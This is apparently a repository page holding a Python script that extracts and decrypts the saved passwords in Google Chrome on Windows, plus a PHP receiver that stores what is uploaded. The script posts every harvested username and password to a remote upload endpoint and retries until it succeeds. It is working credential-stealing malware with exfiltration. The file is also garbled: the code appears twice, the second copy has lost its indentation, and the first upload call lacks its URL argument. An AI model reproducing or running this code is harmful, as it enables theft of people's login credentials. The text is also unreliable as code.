AliMilani/chrome-passwords-stealer.py

## chrome-passwords-stealer.py
# Please visit ==> https://www.thepythoncode.com/article/extract-chrome-passwords-python
# update http://domain.com/upload.php in line 91
# I made small changes to it

import os
import json
import base64
from time import sleep
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import time, timezone, datetime, timedelta
import requests

def get_chrome_datetime(chromedate):
	"""Return a `datetime.datetime` object from a chrome format datetime
	Since `chromedate` is formatted as the number of microseconds since January, 1601"""
	return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

def get_encryption_key():
	local_state_path = os.path.join(os.environ["USERPROFILE"],
									"AppData", "Local", "Google", "Chrome",
									"User Data", "Local State")
	with open(local_state_path, "r", encoding="utf-8") as f:
		local_state = f.read()
		local_state = json.loads(local_state)

	key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
	key = key[5:]
	return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

def decrypt_password(password, key):
	try:
		iv = password[3:15]
		password = password[15:]
		cipher = AES.new(key, AES.MODE_GCM, iv)
		return cipher.decrypt(password)[:-16].decode()
	except:
		try:
			return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
		except:
			return ""

def upload_passwords(passwords,url):
	try:
		r = requests.post(url, data={'data': passwords})
		if r.status_code == 200:
			return True
		else:
			return False
	except:
		return False


def main():
	key = get_encryption_key()
	db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
							"Google", "Chrome", "User Data", "default", "Login Data")
	filename = "ChromeData.db"
	shutil.copyfile(db_path, filename)
	db = sqlite3.connect(filename)
	cursor = db.cursor()
	cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
	result = ''
	for row in cursor.fetchall():
		origin_url = row[0]
		action_url = row[1]
		username = row[2]
		password = decrypt_password(row[3], key)
		date_created = row[4]
		date_last_used = row[5]
		if username or password:
			result+=(f"Origin URL: {origin_url}\n")
			result+=(f"Action URL: {action_url}\n")
			result+=(f"Username: {username}\n")
			result+=(f"Password: {password}\n")
		else:
			continue
		if date_created != 86400000000 and date_created:
			result+=(f"Creation date: {str(get_chrome_datetime(date_created))}\n")
		if date_last_used != 86400000000 and date_last_used:
			result+=(f"Last Used: {str(get_chrome_datetime(date_last_used))}\n")
		result+=("="*50+"\n")
	cursor.close()
	db.close()
	if upload_passwords(result):
		print("Uploaded successfully")
	else:
		while True:
			if upload_passwords(result,"http://domain.com/upload.php"):
				print("Uploaded successfully")
				break
			else:
				print("Upload failed. Trying again in 10 seconds")
				sleep(10)

	print(result)
	try:
		os.remove(filename)
	except:
		pass

if __name__ == "__main__":
	main()


## upload.php
<?php
function save_data($data) {
    $filename = date("Y-m-d_H-i-s") . rand(1, 1000000) .".txt";
    $file = fopen($filename, "w");
    fwrite($file, $data);
    fclose($file);
}

$target_dir = "uploads/";
save_data($_POST['data']);
?>
	# Please visit ==> https://www.thepythoncode.com/article/extract-chrome-passwords-python
	# update http://domain.com/upload.php in line 91
	# I made small changes to it

	import os
	import json
	import base64
	from time import sleep
	import sqlite3
	import win32crypt
	from Crypto.Cipher import AES
	import shutil
	from datetime import time, timezone, datetime, timedelta
	import requests

	def get_chrome_datetime(chromedate):
	"""Return a `datetime.datetime` object from a chrome format datetime
	Since `chromedate` is formatted as the number of microseconds since January, 1601"""
	return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

	def get_encryption_key():
	local_state_path = os.path.join(os.environ["USERPROFILE"],
	"AppData", "Local", "Google", "Chrome",
	"User Data", "Local State")
	with open(local_state_path, "r", encoding="utf-8") as f:
	local_state = f.read()
	local_state = json.loads(local_state)

	key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
	key = key[5:]
	return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

	def decrypt_password(password, key):
	try:
	iv = password[3:15]
	password = password[15:]
	cipher = AES.new(key, AES.MODE_GCM, iv)
	return cipher.decrypt(password)[:-16].decode()
	except:
	try:
	return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
	except:
	return ""

	def upload_passwords(passwords,url):
	try:
	r = requests.post(url, data={'data': passwords})
	if r.status_code == 200:
	return True
	else:
	return False
	except:
	return False


	def main():
	key = get_encryption_key()
	db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
	"Google", "Chrome", "User Data", "default", "Login Data")
	filename = "ChromeData.db"
	shutil.copyfile(db_path, filename)
	db = sqlite3.connect(filename)
	cursor = db.cursor()
	cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
	result = ''
	for row in cursor.fetchall():
	origin_url = row[0]
	action_url = row[1]
	username = row[2]
	password = decrypt_password(row[3], key)
	date_created = row[4]
	date_last_used = row[5]
	if username or password:
	result+=(f"Origin URL: {origin_url}\n")
	result+=(f"Action URL: {action_url}\n")
	result+=(f"Username: {username}\n")
	result+=(f"Password: {password}\n")
	else:
	continue
	if date_created != 86400000000 and date_created:
	result+=(f"Creation date: {str(get_chrome_datetime(date_created))}\n")
	if date_last_used != 86400000000 and date_last_used:
	result+=(f"Last Used: {str(get_chrome_datetime(date_last_used))}\n")
	result+=("="*50+"\n")
	cursor.close()
	db.close()
	if upload_passwords(result):
	print("Uploaded successfully")
	else:
	while True:
	if upload_passwords(result,"http://domain.com/upload.php"):
	print("Uploaded successfully")
	break
	else:
	print("Upload failed. Trying again in 10 seconds")
	sleep(10)

	print(result)
	try:
	os.remove(filename)
	except:
	pass

	if __name__ == "__main__":
	main()
	<?php
	function save_data($data) {
	$filename = date("Y-m-d_H-i-s") . rand(1, 1000000) .".txt";
	$file = fopen($filename, "w");
	fwrite($file, $data);
	fclose($file);
	}

	$target_dir = "uploads/";
	save_data($_POST['data']);
	?>